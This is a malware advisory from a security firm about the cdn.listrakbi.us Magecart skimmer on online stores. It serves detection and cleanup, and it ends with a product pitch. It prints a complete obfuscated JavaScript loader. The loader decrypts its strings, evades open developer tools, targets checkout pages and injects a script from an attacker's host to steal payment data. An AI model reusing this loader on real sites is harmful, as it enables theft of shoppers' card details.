What is cdn.listrakbi.us?
Often found on online stores, cdn.listrakbi.us is a common digital skimmer (also known as Magecart) that was first detected on May 22nd, 2020. So far, Sansec has discovered this malware on 117 different victim stores. The most common attacked platform is Magento 1.
A typical sample of the cdn.listrakbi.us malware in the wild can be observed when selecting "view page source" in your browser. It looks like this:
// https://cdn.listrakbi.us/scripts/script.js?m=fQCollj8B6Qi&v=1
(function() {
var c = function(d) {
var e = 'KbSqiq6E';
var f = [];
for (var g = 0x0; g < d['length'] - 0x1; g += 0x2) {
f['push'](parseInt(d['substr'](g, 0x2), 0x10));
}
var h = String['fromCharCode']['apply'](String, f);
var i = [], j = 0x0, k, l = '';
for (g = 0x0; g < 0x100; g++)
i[g] = g;
for (g = 0x0; g < 0x100; g++) {
j = (j + i[g] + e['charCodeAt'](g % e['length'])) % 0x100;
k = i[g];
i[g] = i[j];
i[j] = k;
}
g = 0x0;
j = 0x0;
for (var m = 0x0; m < h['length']; m++) {
g = (g + 0x1) % 0x100;
j = (j + i[g]) % 0x100;
k = i[g];
i[g] = i[j];
i[j] = k;
l += String['fromCharCode'](h['charCodeAt'](m) ^ i[(i[g] + i[j]) % 0x100]);
}
return l;
};
if (window['outerWidth'] - window['innerWidth'] > 0xa0 || window['outerHeight'] - window['innerHeight'] > 0xa0)
return;
var n = ['48d771762e', '48c67c60391b3b3add'];
var o = n['length'] === 0x0;
for (var p = 0x0; p < n['length']; p++) {
if (window['location']['pathname']['indexOf'](c(n[p])) !== -0x1) {
o = !![];
break;
}
}
if (!o)
return;
var q = document['createElement']('script');
q['type'] = 'text/javascript',
q['src'] = c('0fd16075294a7b60ca07353f953adcb4b05eaec3acb271bbe1830b79889f5eb0b080d32f7333d116b6d76cafc2cde73010253ef98676f4e626726e8821'),
q['async'] = !![];
(document['getElementsByTagName']('head')[0x0] || document['documentElement'])['appendChild'](q);
window['user_tracker'] = c('37ed44561f230706ed');
}());
How does cdn.listrakbi.us work?
The cdn.listrakbi.us skimmer is loaded on the checkout page of a typical store. It lives in the browser of an unsuspecting online customer. Whenever he or she enters her payment information, the private data is siphoned off to an offshore server. Usually, this data is then sold on the dark web within 2-10 weeks.
How to clean cdn.listrakbi.us?
The cdn.listrakbi.us malware can be easily removed. It is usually hidden in a database field, such as core_config_data, cms_blocks or cms_pages. Sometimes the malware is appended to a specific .js code file. However just cleaning the malware is not enough: you need to discover the root cause of this malware, otherwise you will soon find the same malware back in your store.
Sansec specializes in protection of online stores. We have investigated and cleaned thousands of stores. We decided to put our knowledge into our software solution eComscan, so that everybody can use it. Save yourself lots of work and headaches and download eComscan today!
